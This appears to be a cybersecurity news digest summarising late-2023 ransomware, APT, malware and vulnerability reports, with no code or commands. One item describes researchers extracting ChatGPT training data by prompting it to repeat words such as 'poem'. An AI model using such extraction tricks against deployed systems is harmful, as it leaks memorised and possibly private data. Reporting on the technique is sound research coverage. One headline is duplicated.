Shadowserver has released new vulnerability metrics surrounding the recently discovered Terrapin vulnerabilities that threaten the integrity of some SSH connections. The Terrapin flaws target the SSH protocol, affecting both clients and servers, and the attack was developed by academic researchers from Ruhr University Bochum in Germany.

Experts Warn of JinxLoader: Loader Used to Spread FormBook and XLoader

Researchers from Palo Alto Networks and Symantec warned of a new Go-based malware loader called JinxLoader, which is being used to deliver next-stage payloads such as FormBook and XLoader. The name of the threat comes from a League of Legends character. Palo Alto Networks’ Unit 42 first observed the malware in November 2023, reporting that it has been advertised on the hacking forum Hackforums since April 30, 2023.

Microsoft: Hackers Target Defense Firms With New FalseFont Malware

Yesterday, Microsoft posted a series of tweets on X (formerly known as Twitter) stating that it observed Iranian cyber-espionage group APT33 deploy a new backdoor dubbed FalseFont in attacks targeting organizations in the Defense Industrial Base (DIB) sector. According to the tech giant, FalseFont was first observed in attacks as early as November 2023.

Malware Leveraging Public Infrastructure Like GitHub on the Rise

Researchers from ReversingLabs have observed an increase in threat actors using GitHub open source development platform to host malware. The use of public services as command-and-control (C2) infrastructure isn’t a revolutionary technique for malicious actors, but the researchers highlight two novel techniques deployed on GitHub.

Justice Secretary in Deepfake General Election Warning

UK Secretary of State for Justice, Robert Buckland, has voiced concerns about the threat of deepfakes to British democracy prior to upcoming elections. He cited that there is a “clear and present danger” regarding deepfakes and noted how they can be used to potentially erode trust in information and sway opinions. Buckland highlighted that with AI being easily accessible and the sheer scale of generative AI, individuals can create and share content rapidly.

Fake Delivery Websites Surge By 34% in December

With many shoppers rushing to order Christmas gifts, scammers are taking advantage of this opportunity by creating phishing sites impersonating delivery services. According to Group-IB, these fake delivery sites have surged by 34% in December alone, with the company identifying 587 sites designed to look like legitimate postal operators and delivery companies in the first 10 days of December.

Fake F5 BIG-IP Zero-Day Warning Emails Push Data Wipers

Israel’s National Cyber Directorate (INCD) recently disclosed a new phishing campaign that is distributing Windows and Linux data wipers via emails pretending to be a warning about a zero-day vulnerability in F5 BIG-IP devices. According to INCD, the emails push out an executable named F5UPDATER[.]exe for Windows users, while a shell script named update[.]sh is used for Linux users.

Justice Department Disrupts Prolific ALPHV/Blackcat Ransomware Variant

Yesterday, the U.S. Justice Department announced the disruption of the BlackCat ransomware group, which to date has managed to target the computer networks of more than 1,000 victims, including those that support U.S. critical infrastructure (government facilities, emergency services, defense industrial base companies, critical manufacturing, and healthcare and public health facilities).

New Go-Based JaskaGO Malware Targeting Windows and macOS Systems

AT&T Alien Labs has uncovered a new Go-based information stealer malware dubbed JaskaGo designed to target both Windows and Apple macOS systems. According to researchers, the info-stealer comes equipped with an extensive array of commands from its C2 server that enable actors to execute shellcode, enumerate running processes, harvest information from the victim system, and download additional payloads.

Novel Terrapin Attack Uses Prefix Truncation to Downgrade the Security of SSH Channels

Secure Shell Protocol (SSH) was developed in early 1995, after a password sniffer was used to discover passwords stored in plain text on Finland’s Helsinki University of Technology network. As one of the first network tools to route traffic through an impregnable tunnel fortified with a still-esoteric feature known as "public key encryption," SSH quickly caught on around the world.

What To Do When Receiving Unprompted MFA OTP Codes

This article highlights common methods cybercriminals use to bypass multi-factor authentication, and specifically what it means when you receive unprompted one-time passcodes (OTP). Receiving an unprompted OTP by email or text should be a cause for concern, as it likely means your credentials have been stolen.

New Pierogi++ Malware by Gaza Cyber Gang Targeting Palestinian Entities

Researchers at SentinelOne have uncovered an updated version of a backdoor dubbed Pierogi which is being used by the Gaza Cyber Gang, a pro-Hamas threat actor, to target Palestinian entities. The new variant, referred to as Pierogi++, is written in the C++ programming language. Similar to its predecessor, Pierogi++ is designed to take screenshots, execute commands, and download other payloads.

Threat of Violence Likely Heightened Throughout Winter

The FBI issued an advisory that they are closely monitoring threats to public safety during the holiday season, which may be amplified by the ongoing Israel-Hamas conflict. The FBI, Department of Homeland Security (DHS), and National Counterterrorism Center (NCTC) are issuing this Public Service Announcement to highlight elements posing potential threats in the United States from a variety of actors during the winter season.

BianLian, White Rabbit, and Mario Ransomware Gangs Spotted in a Joint Campaign

Based on a recent Digital Forensics & Incident Response (DFIR) engagement with a law enforcement agency (LEA) and one of the leading investment organizations in Singapore (and other victims), Resecurity (USA) has uncovered a meaningful link between three major ransomware groups. Resecurity’s HUNTER (HUMINT) unit spotted the BianLian, White Rabbit, and Mario ransomware gangs collaborating in a joint extortion campaign targeting publicly-traded financial services firms.

Chinese APT Volt Typhoon Linked to Unkillable SOHO Router Botnet

The US cybersecurity landscape faces a critical challenge with the emergence of a highly resilient botnet operated by the Chinese-backed Volt Typhoon group. This botnet has ingeniously repurposed end-of-life Small Office/Home Office (SOHO) routers from Cisco, Netgear, and Fortinet, and set up a Tor-like covert data transfer network to perform malicious operations. Notably, these routers, lacking security updates, now serve as a central element in Volt Typhoon’s penetration strategy across critical sectors like communications, manufacturing, and government.

Microsoft Seized the US Infrastructure of the Storm-1152 Cybercrime Group

Microsoft recently announced that it seized multiple domains used by the cybercrime group Storm-1152 to sell fraudulent Outlook accounts. According to the vendor, Storm-1152 has registered over 750 million fraudulent Microsoft accounts, enabling the group to generate millions of dollars in sales. After obtaining a court order from the Southern District of New York on December 7, 2023.

BazarCall Attacks Abuse Google Forms to Legitimize Phishing Emails

Email security firm Abnormal uncovered a new wave of BazarCall attacks abusing Google Forms to target users. First documented in 2021, BazarCall is a type of phishing attack that utilizes fake payment/subscription invoices in emails impersonating known brands. In this case, victims are notified that their account has been charged and should contact customer support if they don’t recognize the transaction. Rather than including a link in the email, the actors will leave behind a phone number that the victim can call.

Cozy Bear Hackers Target JetBrains TeamCity Servers in Global Campaign

In a joint advisory published on December 13, 2023, six security and intelligence agencies in the US, the UK and Poland warned that Cozy Bear has been exploiting an authentication bypass vulnerability in TeamCity (CVE-2023-42793) since at least September 2023. If compromised, access to a TeamCity server would provide malicious actors with access to that software developer’s source code, signing certificates, and the ability to subvert software compilation and deployment processes. The access could also be used to conduct software supply chain attacks.

Vulnerabilities Now Top Initial Access Route For Ransomware

Cybersecurity insurance provider Corvus reports that ransomware actors are switching tactics and are choosing to exploit vulnerabilities rather than leverage phishing emails to breach victim organizations. Analyzing metrics from claims data this year, Corvus was able to examine threat actor activity. The company claims that vulnerability exploitation rose as an initial access method from nearly 0% of ransomware claims in H2 2022 to almost a third in the first half of 2023.

Russia Set to Ramp Up Attacks on Ukraine’s Allies This Winter

A new report by Cyjax warns of an increase in cyberattacks from Russia targeting Ukraine and its allies as the winter season approaches. According to researchers, Russia’s missile production is struggling to keep pace with its tactical, operational, and strategic usage, due to economic sanctions and a shortage of workers.

What To Do If Your Company Was Mentioned on Darknet?

This article examines different scenarios where your company may be mentioned on the dark web, and what you can do to navigate and mitigate the associated risks. Specifically, the article focuses on the sale of compromised accounts, internal databases and documents, access to corporate infrastructure, and personally identifiable information such as ID photos, driver's licenses, etc.

Russian APT28 Hackers Targeting 13 Nations in Ongoing Cyber Espionage Campaign

A new blog post from IBM’s X-Force highlights the use of Israel-Hamas conflict lures by APT28, a group of Russian military hackers, to deliver Headlace malware. For its part, Headlace is a multi-component malware that includes a dropper, a VBS launcher, and a backdoor using MSEdge in headless mode, designed to download second-stage payloads and exfiltrate credentials as well as other sensitive details.

Ukraine's Largest Phone Operator Hack Tied to War With Russia

Ukraine’s largest mobile network operator, Kyivstar, was impacted by a cyber event that led to significant shutdowns. The company, which is owned by Amsterdam-based Veon, announced on December 12th that a powerful cyber attack caused a technical failure, which impacted Internet access and mobile communications for customers.

Privilege Elevation Exploits Used in Over 50% Of Insider Attacks

A report published by CrowdStrike researchers indicates that insider threats are escalating, with a surge in unauthorized actions using privilege escalation flaws. Approximately 55% of these threats leverage privilege escalation exploits, while 45% stem from downloading risky tools or misusing them.

AutoSpill Attack Steals Credentials from Android Password Managers

Security researchers developed a new attack, which they named AutoSpill, to steal account credentials on Android during the autofill operation. In a presentation at the Black Hat Europe security conference, researchers from the International Institute of Information Technology (IIIT) at Hyderabad said that their tests showed that most password managers for Android are vulnerable to AutoSpill, even if there is no JavaScript injection.

Toyota Warns Customers of Data Breach Exposing Personal, Financial Info

Toyota Financial Services recently warned its customers about a data breach, where actors were able to gain unauthorized access to some of its systems in Europe and Africa, allowing the actors to steal sensitive personal and financial data. Medusa ransomware has claimed responsibility for the attack, demanding that an $8 million ransom be paid in exchange for the stolen data.

ALPHV/BlackCat Site Downed After Suspected Police Action

Last Friday, cyber security firm RedSense disclosed on X (formerly known as Twitter) that BlackCat Ransomware’s Tor data leak site had been taken down after police action. As of writing, no official disclosure regarding such a takedown has been published by law enforcement authorities.

Iran Threatens Israel's Critical Infrastructure With 'Polonium' Proxy

An Iranian proxy hacking group named Polonium, operating from Lebanon, poses a serious threat to Israel’s critical infrastructure. Despite being less known than other hacking groups, Polonium has intensified its attacks, targeting multiple Israeli sectors and evolving its tactics over time. Microsoft reported that Polonium spied on over 20 Israeli organizations, including key sectors like Transportation, IT, Finance, and Healthcare, in Spring 2022.

Russian Military Hackers Target NATO Fast Reaction Corps

APT28, a group of Russian military hackers, has been exploiting a Microsoft Outlook zero-day (CVE-2023-23397) since March 2022 to target multiple European NATO member countries, including a NATO Rapid Deployable Corps. Over the course of 20 months, researchers at Palo Alto Networks’ Unit 42 have observed this group launch three different campaigns targeting at least 30 organizations across 14 nations deemed of probable strategic intelligence significance to Russia's military and government.

Ransomware Surge is Driving UK Inflation, Says Veeam

New data gathered by Veeam indicates that a surge in ransomware attacks has caused businesses in the UK to increase prices, adding to the already high inflation. Veeam surveyed 100 UK businesses with over 500 employees that had been compromised by ransomware. According to the software company, large companies had to increase costs to customers by an average of 17% following an attack.

Forward Momentum: Key Learnings From Trend Micro’s Security Predictions for 2024

Advances in cloud technology, artificial intelligence and machine learning, and Web3 are reshaping the threat landscape, urging organizations to re-strategize their defenses and stay up to date with the latest trends and threats. A new blog post by Trend Micro highlights the new challenges that will come with these emerging technologies and what to expect for the upcoming new year.

Ninety Percent of Energy Companies Suffer Supplier Data Breach

Security Scorecard recently analyzed the cybersecurity posture of the largest coal, oil, natural gas, and electric companies in the US, UK, France, Germany, and Italy, as well as their suppliers. According to the vendor, UK energy firms received the highest average security rating (80% holding a B or above). However, a third of global firms received a rating of C or lower, making them susceptible to a breach.

Why Cloud Security Matters in Today’s Business World

As companies increasingly adopt cloud computing, a report by Ermetic and IDC reveals that 80% of CISOs experienced cloud data breaches in the last 18 months, with 43% facing 10 or more breaches. The report emphasizes the need for a robust understanding of cloud security to safeguard organizations, personnel, and customers during the transition. Cloud security involves principles like access controls and system audits. Key reasons to embrace it include scalability, reliability, and protection against DDoS attacks.

New Krasue Linux RAT Targets Telecom Companies in Thailand

Group-IB researchers discovered a previously undetected Linux remote access trojan called Krasue being employed in attacks aimed at telecom companies in Thailand. The Krasue Remote Access Trojan (RAT) emerged in 2021 according to samples found on VirusTotal. The name “Krasue,” comes from the Thai name of a nocturnal native spirit known throughout Southeast Asian folklore.

LockBit Remains Top Global Ransomware Threat

A new report from ZeroFox highlights LockBit’s continued dominance in the ransomware landscape, with the group accounting for 25% of all ransomware and digital extortion attacks worldwide between January 2022 and September 2023. In particular, LockBit poses a big threat to entities in North America, with an average of 40% of LockBit victims based in this region, spanning the manufacturing, construction, retail, legal & consulting, and healthcare sectors. Researchers note this is expected to increase to 50% by the end of 2023.

Hackers Breach US Govt Agencies Using Adobe ColdFusion Exploit

CISA recently published an advisory warning that hackers are exploiting a critical vulnerability in Adobe ColdFusion to gain initial access to government servers. Tracked as CVE-2023-26360, the flaw relates to an improper access control vulnerability in Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier), which could result in arbitrary code execution.

Governments Spying on Apple, Google Users Through Push Notifications - US Senator

Senator Ron Wyden has raised concerns that unidentified governments are surveilling smartphone users through push notifications on apps, demanding data from Google and Apple. Push notifications, used by various apps for updates, messages, and news alerts, often travel through Google and Apple servers. This unique access gives the companies insight into app traffic and user activity, potentially facilitating government surveillance.

Russian APT28 Exploits Outlook Bug to Access Exchange

Microsoft issued a warning regarding the exploitation of CVE-2023-23397 by APT 28, a Russian state sponsored group. The targeted entities include government, energy, transportation, and other key organizations in the United States, Europe, and the Middle East. CVE-2023-23397 was first disclosed and patched as a zero-day bug in Microsoft’s March 2023 Patch Tuesday update round.

New AeroBlade Hackers Target Aerospace Sector in the U.S.

Cyber security firm BlackBerry has uncovered a campaign targeting an aerospace organization in the United States. Researchers are tracking the actors behind this campaign as ‘AeroBlade.’ Based on the observed attack, the actors used spear-phishing as their delivery mechanism, employing a weaponized document sent as an email attachment.

Holiday Shopping Scams Persist with Cybercriminal Tactics

Cybercriminals are currently targeting SaaS services and utilizing AI technology, social media phishing, and brand impersonation to pilfer from various sectors, impacting the reputations of legitimate businesses. It is crucial to adopt proactive measures, such as manual or automated takedown services, to maintain consumer trust during the bustling holiday shopping season. The USPS phishing attack encompasses over 3,000 phishing domains that mimic reputable brands like Walmart, with scammers exploiting stolen data to entice victims into revealing sensitive banking details.

Florida Water Agency Latest to Confirm Cyber Incident as Feds Warn of Nation-state Attacks

A regulatory agency in Florida confirmed they responded to a recent cyber attack last week as US cybersecurity agencies warn of foreign attacks against water utilities. A spokesperson for the St. Johns River Water Management District, which works closely with utilities on water supply issues, confirmed that it “identified suspicious activity in its information technology environment” and that “containment measures have been successfully implemented.”

Over 20,000 Vulnerable Microsoft Exchange Servers Exposed to Attacks

The ShadowServer Foundation is warning that tens of thousands of Microsoft Exchange email servers in Europe, the United States, and Asia are exposed on the public internet and vulnerable to remote code execution flaws. The mail systems run a software version that is currently unsupported and no longer receives any updates, being vulnerable to multiple security issues, some with a critical severity rating.

Check Point Research Navigates Outlook’s Security Landscape: The Obvious, the Normal, and the Advanced

In a recent blog from Check Point, Outlook, the desktop app in the Microsoft Office suite, is highlighted as one of the world's most widely used applications for organizational communication. However, it poses significant security risks, acting as a critical gateway for cyber threats. The blog categorizes attack vectors into three types: the "obvious" Hyperlink attack vector, the "normal" Attachment attack vector, and the "advanced" Email Reading and Special Object attack vectors.

Qakbot Takedown Aftermath: Mitigations and Protecting Against Future Threats

The DOJ and FBI collaborated to dismantle the Qakbot malware and its botnet, successfully disrupting a long-standing threat. However, concerns linger as Qakbot may still pose a risk, although in a reduced form. The takedown removed the malware from a significant number of devices, including 700,000 globally and 200,000 in the U.S. Yet, recent findings suggest Qakbot remains active but weakened.

Simple Hacking Technique Can Extract ChatGPT Training Data

Researchers from Google DeepMind, Cornell University, and other institutions found that the widely used generative AI chatbot, ChatGPT, is susceptible to data leaks. By prompting ChatGPT to repetitively say words like "poem," "company," and others, the researchers were able to make the chatbot regurgitate memorized portions of its training data.

US Govt Sanctions North Korea’s Kimsuky Hacking Group

On Thursday the U.S. Department of Treasury’s Office of Foreign Assets Control (OFAC) sanctioned eight North Korean agents for facilitating sanctions evasion including revenue generation and missile-related technology procurement that support the Democratic People’s Republic of Korea’s (DPRK) weapons of mass destruction programs.

New ‘Turtle’ macOS Ransomware Analyzed

Several vendors on VirusTotal have detected a new ransomware dubbed Turtle which is capable of not only targeting Windows and Linux systems but also macOS. Cybersecurity researcher Patrick Wardle who analyzed this new strain, says that Turtle Ransomware is currently not sophisticated. The malware was developed in the Go programming language.

RedLine Stealer Malware Deployed Via ScrubCrypt Evasion Tool

Researchers from Satori Threat Intelligence discovered a new version of the ScrubCrypt obfuscation tool being used to target organizations with the RedLine stealer malware. This latest version of ScrubCrypt is for sale on dark web marketplaces, and is being used in account takeover and fraud attacks.

Behind the Attack: LUMMA Malware

Researchers at Perception Point recently unveiled a sophisticated malware attack aimed at bypassing threat detection systems. The attack involves impersonating a financial services company via a fake invoice email. The email includes a button that leads to an unavailable website which urges users to visit a seemingly legitimate link for the invoice.

Qlik Sense Exploited in Cactus Ransomware Campaign

According to a new blog post by researchers at Arctic Wolf, a set of known vulnerabilities in Qlik Sense, a cloud analytics and business intelligence platform, are being exploited to deploy ransomware. Tracked as CVE-2023-41266, CVE-2023-41265, and CVE-2023-48365, the flaws are being chained together to achieve remote code execution on targeted systems.

Iran-Backed Cyber Av3ngers Escalates Campaigns Against U.S. Critical Infrastructure

The Iran-backed Cyber Av3ngers, affiliated with the IRGC, has been actively exploiting Programmable Logic Controllers (PLCs) in Water and Wastewater treatment plants, targeting critical infrastructure installations in the U.S. The group, known for making false claims, initiated attacks on various water authorities, an aquarium, and a brewery. They focus on Unitronics PLCs, leveraging open source tools and exploiting vulnerabilities. The recent campaign expanded to target critical infrastructure globally, particularly those using equipment associated with Israel.

New BLUFFS Attack Lets Attackers Hijack Bluetooth Connections

Researchers from Eurecom have developed six new attacks they have collectively named “BLUFFS.” These vulnerabilities can be used for device impersonation and man-in-the-middle (MitM) attacks. BLUFFS exploits two previously unknown flaws in Bluetooth, related to how session keys are derived to decrypt data in exchange.

Iranian Hackers Exploit PLCs in Attack on Water Authority in U.S.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is responding to a cyber attack on the Municipal Water Authority of Aliquippa, Pennsylvania. The attack involved the exploitation of Unitronics programmable logic controllers (PLCs) and has been attributed to the Iranian-backed hacktivist group Cyber Av3ngers.

General Electric, DARPA Hack Claims Raise National Security Concerns

General Electric (GE) and the Defense Advanced Research Projects Agency (DARPA) are reported to have experienced security breaches, with stolen data allegedly available for sale on the Dark Web. The compromised information includes access credentials, DARPA-related military data, SQL files, and more. GE has acknowledged the breach and is actively investigating the matter. DARPA, known for collaborating with GE on various projects, may have classified information on weapons programs and artificial intelligence research in its data stores.

General Electric, DARPA Hack Claims Raise National Security Concerns

General Electric, an American multinational conglomerate that has several divisions including aerospace, power, and renewable energy, is investigating claims that a threat actor breached its development environment and leaked allegedly stolen data. The development comes after a threat actor named IntelBroker posted to a dark web forum claiming to have access to General Electric’s development and software pipelines.

Key Cybercriminals Behind Notorious Ransomware Families Arrested in Ukraine

A joint operation carried out by Europol and law enforcement agencies has led to the arrest of 5 key suspects in Ukraine believed to be core members of various ransomware operations including LockerGoga, MegaCortex, Dharma, and the now defunct Hive ransomware. Since 2019, these individuals have targeted over 1,800 victims across 71 countries, compromising large corporations.

Daixin Team Claims Attack on North Texas Municipal Water District

The Daixin Team, a group known for carrying out ransomware attacks, has listed the North Texas Municipal Water District (NTMWD) as a victim on their data leak site. The actors claim to have stolen large amounts of sensitive data from the organization and are threatening to release it publicly. The information stolen is said to include board meeting minutes, internal project documentation, personnel details, audit reports, and more. The leak of the data puts the organization at risk of fraud in the coming months.

Hacktivists Breach U.S. Nuclear Research Lab, Steal Employee Data

The Idaho National Laboratory (INL) announced this week that they suffered a cyberattack after SiegedSec hacktivists leaked stolen human resources data online. INL is a nuclear research center run by the U.S. Department of Energy that employs 5,700 specialists in atomic energy, integrated energy, and national security.

Exploit for CrushFTP RCE Chain Released, Patch Now

A critical vulnerability (CVE-2023-43177) in CrushFTP allows hackers to access files, execute code, and steal passwords. Although a fix was issued in version 10.5.2, a recent public exploit by Converge demands immediate updates for CrushFTP users. This exploit lets attackers read and delete files, and potentially gain total control over systems, using specific web ports and functions in CrushFTP.

8Base Group Deploying New Phobos Ransomware Variant via SmokeLoader

Last Friday, Cisco Talos published a blog post, highlighting that 8Base ransomware actors are using a variant of the Phobos ransomware to carry out financially motivated attacks. Although most Phobos variants have been distributed using SmokeLoader, a backdoor trojan, researchers note that in 8Base campaigns, the actors are embedding the ransomware component into encrypted payloads, which are then decrypted and loaded into the SmokeLoader process memory.

Popular Dragon Touch Tablet for Kids Infected with Corejava Malware

Retailers like Amazon have promoted affordable Android devices for children, such as the Dragon Touch KidzPad Y88X 10 tablet. However, research by the Electronic Frontier Foundation (EFF) revealed malware and riskware on the device, leading to Amazon removing it from the platform. Other Y88X models remain available. This is not the first instance; in January 2023, Amazon sold a T95 Android TV box with preinstalled malware. Both instances involved the Corejava malware.

MySQL Servers Targeted by ‘Ddostf’ DDoS-As-A-Service Botnet

The ‘Ddostf’ malware botnet is attacking MySQL servers to turn them into a DDoS service. AhnLab Security Emergency Response Center (ASEC) discovered this while tracking threats against database servers. Ddostf infiltrates MySQL servers either through vulnerabilities in unpatched systems or by cracking weak administrator account passwords. These attackers search the web for exposed MySQL servers, trying to breach them by brute-forcing administrator credentials.

Beware: Malicious Google Ads Trick WinSCP Users into Installing Malware

Cybersecurity company Securonix has uncovered a new campaign dubbed SEO#LURKER, where actors are tricking WinSCP users into installing malware via SEO poisoning and bogus Google ads. In particular, the actors are using dynamic search ads which automatically generate ads based on a site's content to serve the malicious ads that take the victims to an infected site, which in this case is a compromised WordPress site (gameeweb[.]com). Researchers say this WordPress site will redirect the victim to a phishing site advertising a fake installation for WinSCP, in turn infecting the victim with malware.

#StopRansomware: Rhysida Ransomware

A new joint advisory from CISA and the FBI has been issued detailing observed TTPs and IOCs to help organizations protect against Rhysida Ransomware. Rhysida is a fairly new ransomware that was first detected in May 2023. Like any other ransomware gang, the group engages in double extortion schemes where it will encrypt and exfiltrate victims’ files, threatening to publish the data online unless a ransom is paid.

FBI Warns: Five Weeks In, Gaza Email Scams Still Thriving

The FBI is warning of cybercriminals taking advantage of the war in Gaza to solicit funds from unsuspecting victims. According to alerts sent out by the agency, these fraudsters are using various schemes, including emails, social media, cold calls, and websites masquerading as fundraisers and charities, to convince end users to donate money, stating that the funds will go to victims of the ongoing conflict. These donations are requested in the form of gift cards, wire transfers, and cryptocurrency, making them difficult to trace.

Zero-Days in Edge Devices Become China's Cyber Warfare Tactic of Choice

Over the past five years, Chinese state-sponsored cyber operations have evolved into a more mature and coordinated threat, focusing on exploiting both known and zero-day vulnerabilities in public-facing security and network appliances. They have also placed a strong emphasis on operational security and anonymity. These changes have been influenced by both internal factors, like military restructuring and changes in domestic regulations, and external factors, including reporting by Western governments and the cybersecurity community.

LockBit Ransomware Exploits Citrix Bleed in Attacks, 10K Servers Exposed

About a month ago, Citrix fixed a critical information disclosure flaw (CVE-2023-4966), “Citrix Bleed,” impacting Citrix NetScaler ADC and NetScaler Gateway. As of writing, thousands of internet-exposed endpoints are still running vulnerable appliances despite patches being released. As such, threat actors are using this opportunity to launch attacks. One of these actors is the LockBit ransomware group, which researchers say is using publicly available exploits for CVE-2023-4966 to breach the systems of large organizations, steal data, and encrypt files.

82% of Attacks Show Cyber-Criminals Targeting Telemetry Data

A new report from Sophos indicates that cyber-criminals are disabling or wiping out logs in 82% of incidents, making it difficult for organizations to trace back and determine what happened on systems during a crisis. What’s more, based on a case study conducted by Sophos, nearly a quarter of organizations investigated didn’t have the appropriate logging in place for incident responders. Researchers say this was due to several factors, including insufficient retention, re-imaging, or a lack of configuration. “In an investigation, not only would this mean the data would be unavailable for examination, but the defenders would have to spend time figuring out why it wasn’t available,” stated researchers in a recent blog post.

BlackCat Ransomware Gang Targets Businesses Via Google Ads

ALPHV/BlackCat ransomware threat actors have been seen using Google Ads to distribute malware. By masquerading as popular software products like Advanced IP Scanner and Slack, the group has been luring professionals to attacker-controlled websites. The victims, thinking they are downloading legitimate software, are unknowingly installing a piece of malware called Nitrogen. Nitrogen serves as initial-access malware, providing intruders with a foothold into the target organization’s IT environment.

Steps CISOs Should Take Before, During & After a Cyberattack

In today's complex cybersecurity landscape, cyberattacks are inevitable. Organizations, regardless of size or industry, must establish detailed playbooks for effective response. Chief Information Security Officers (CISOs) play a crucial role in preparing for attacks by fostering relationships, educating leaders, and developing comprehensive frameworks.

DP World Cyberattack Blocks Thousands of Containers in Ports

International logistics firm DP World Australia announced that a cyber attack has severely disrupted its regular freight movement in multiple Australian ports. DP World specializes in cargo logistics, port terminal operations, maritime services, and free trade zones, and has an annual revenue of over $10 billion. In total, the firm operates 82 marine and inland terminals in 40 countries, handles 70 million containers annually carried by 70,000 vessels, and manages roughly 10% of all global container traffic. DP World has the largest presence in Australia, handling over 40% of the nation’s container trade.

Update: Iranian Hackers Launch Malware Attacks on Israel’s Tech Sector

Imperial Kitten, also known as Tortoiseshell, TA456, Crimson Sandstorm and Yellow Liderc, has launched a new campaign targeting transportation, logistics, and technology companies in the Middle East. Associated with the Iranian Revolutionary Guard Corps (IRGC), this threat actor, using the online persona Marcella Flores, has been active since at least 2017, conducting cyberattacks across sectors like defense technology, telecommunications, maritime, energy, and consulting.

New Ransomware Group Emerges with Hive's Source Code and Infrastructure

Hunters International, a newly emerged ransomware group, has acquired the source code and infrastructure from the dismantled Hive operation, a once-prolific ransomware-as-a-service (RaaS) group. The Hive group's operations were halted as part of a coordinated law enforcement effort in January 2023. This move allowed Hunters International to start its own cyber threat activities with a mature toolkit.

Signature Techniques of Asian APT Groups Revealed

The Kaspersky Cyber Threat Intelligence team has unveiled crucial insights into the tactics, techniques and procedures (TTPs) employed by Asian Advanced Persistent Threat (APT) groups. In a report published today, Kaspersky reveals TTPs found from their examination of one hundred global cybersecurity incidents.

Dragos: OT Threat Intelligence in Cyber Assessment Framework (CAF)

Dragos recently highlighted the UK National Cyber Security Centre's Cyber Assessment Framework (CAF) in a report, emphasizing its global applicability. The CAF, designed to enhance government cybersecurity, outlines top-level outcomes for good cybersecurity. While initially aimed at the UK, its principles are valuable globally.

Russian-Speaking Threat Actor “Farnetwork” Linked to 5 Ransomware Gangs

According to a report from cybersecurity company Group-IB, a threat actor known as 'farnetwork' has operated under various usernames like farnetworkl, jingo, jsworm, razvrat, piparkuka, and farnetworkitand. They actively sought affiliates for different ransomware operations on Russian-speaking hacker forums. In March, farnetwork started recruiting affiliates for their ransomware-as-a-service (RaaS) program based on the Nokoyawa locker.

Beware, Developers: BlazeStealer Malware Discovered in Python Packages on PyPI

According to a new report from Checkmarx, throughout 2023 threat actors have been distributing malicious Python packages disguised as legitimate obfuscation tools to execute BlazeStealer malware on targeted systems. Once executed, BlazeStealer will retrieve a malicious script from an external source and run a discord bot designed to enable the threat actor to gain complete control over the victim’s computer.

Ransomware Actors Continue to Gain Access through Third Parties and Legitimate System Tools

In a new advisory, the FBI noted that ransomware actors continue to gain access through third-party vendors and services. Between 2022 and 2023, the FBI observed ransomware attacks compromising casinos through third-party gaming vendors. In particular, small and tribal casinos were targeted, with the threat actors encrypting the PII data of employees and patrons, which would then be held for ransom payments.

Ethical Hackers Enhance Cybersecurity with Generative AI

The growing use of digital technology makes cybersecurity more important than ever. Ethical hackers, who identify and prevent cyber threats, are increasingly using AI tools like ChatGPT. A report by Bugcrowd reveals that many hackers believe AI will change how they work in the coming years. While AI can't replace human creativity in security, it helps in tasks like data analysis and vulnerability detection.

Okta Breach: Employee's Personal Google Account Usage on Company Laptop Blamed

In a recent statement from Okta security chief David Bradbury, Bradbury confirmed that from September 28, 2023, to October 17, 2023, a threat actor gained unauthorized access to files inside Okta’s customer support system associated with 134 Okta customers. These files contained session tokens, which the threat actor was able to use to hijack the legitimate Okta sessions of 5 customers.

Critical Atlassian Confluence Bug Exploited in Cerber Ransomware Attacks

Last Tuesday, Atlassian released security updates to address a critical improper authorization vulnerability impacting all versions of Confluence Data Center and Server. Tracked as CVE-2023-22518, the vulnerability can be used in data destruction attacks targeting internet-exposed and unpatched instances. While Atlassian initially noted that it was unaware of reports of active exploitation, the vendor updated its advisory on Friday, stating that threat actors are starting to exploit the flaw in attacks in the wild.

Over Half of Users Report Kubernetes/Container Security Incidents

A report from Infosecurity Magazine says that cloud-native development practices are creating dangerous new security blind spots for organizations in the US, UK, France, and Germany. A study by Venafi polled 800 security and IT leaders from large organizations based in these four countries. It found that 59% of respondents have experienced security incidents in their Kubernetes or container environments.

A Ukrainian Company Shares Lessons in Wartime Resilience

MacPaw, a Ukrainian software company, faced the challenge of maintaining business continuity during the Russian invasion. Their CTO, Vira Tkachenko, explained how they prepared for wartime cyber resilience, including forming an emergency team, prioritizing employee safety and service delivery, fortifying their headquarters, ensuring power and connectivity options, building hardware reserves, setting up redundant communications, freezing code changes, and dealing with increased cyberattacks.

Adtran - AOE Server Vulnerability Advisory

AOE servers that are not properly secured are susceptible to a security vulnerability that could potentially grant unauthorized access to the server via the AOE Server Admin user account. Such compromised servers are consequently vulnerable to ransomware attacks, posing a significant security risk.

MITRE ATT&CK v14 Released

MITRE has released MITRE ATT&CK v14, the newest iteration of its popular investigation framework / knowledge base of tactics and techniques employed by cyber attackers. The goal of MITRE ATT&CK is to catalog and categorize the known tactics, techniques, and procedures (TTPs) used by adversaries in real-world attacks.

Common Vulnerability Scoring System v4.0 Summary

FIRST, the Forum of Incident Response and Security Teams, will release this week version 4.0 of the Common Vulnerability Scoring System (CVSS). CVSS is an open framework that allows organizations and researchers to communicate specific characteristics and severities of software vulnerabilities.

Executive Order on the Safe, Secure, and Trustworthy Development and Use of Artificial Intelligence

President Joe Biden has signed an executive order aimed at regulating generative AI systems like ChatGPT, recognizing their transformative potential and potential risks. The order focuses on ensuring the safe and responsible development and use of AI. It directs various federal agencies and departments to create standards and regulations for AI in various areas, including criminal justice, education, health care, housing, and labor, with an emphasis on protecting civil rights and liberties.

Mass Exploitation of ‘Citrix Bleed’ Vulnerability Underway

Last week, Citrix warned that threat actors are actively exploiting a critical information disclosure vulnerability impacting Citrix NetScaler ADC and Gateway instances. Tracked as CVE-2023-4966, the vulnerability can be exploited by unauthenticated attackers to leak sensitive information from on-prem appliances that are configured as an AAA virtual server or gateway. In the past couple of days, security researchers have noticed an alarming increase in exploitation attempts, with several threat actors including ransomware groups, targeting vulnerable instances.

Dozens of Countries Will Pledge to Stop Paying Ransomware Gangs

As part of the upcoming third annual meeting of the International Counter-Ransomware Initiative, the Biden administration and dozens of its foreign allies will pledge to stop paying ransomware gangs. Representatives from 48 countries, the European Union, and Interpol are expected to attend this week’s summit, which will focus on strategies to block funds used by ransomware gangs to fuel their operations.

'Prolific Puma' Hacker Gives Cybercriminals Access to .us Domains

